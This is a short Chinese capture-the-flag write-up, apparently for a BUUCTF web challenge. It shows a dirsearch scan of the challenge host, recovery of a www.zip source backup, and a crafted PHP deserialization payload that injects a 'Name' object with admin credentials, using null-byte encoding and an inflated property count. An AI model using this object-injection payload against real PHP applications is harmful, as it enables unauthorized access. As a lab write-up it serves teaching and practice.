打开题目
游戏界面
猜测php里面有文件,我们可以用dirsearch
扫描一下这个服务器
执行命令
dirsearch -u http://2999dfd5-1d43-4a81-a088-9e41c9dccab4.node4.buuoj.cn/ -e php > test.log
最后在log文件中找到一个 200 www.zip
浏览器输入payload下载下来
得到目录文件
解读一下php代码,进行反序列化
payload
?select=O:4:"Name":3:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}
但是发现这个里面有空格,所以把空格url编码变成%00再传参
Payload:
/?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}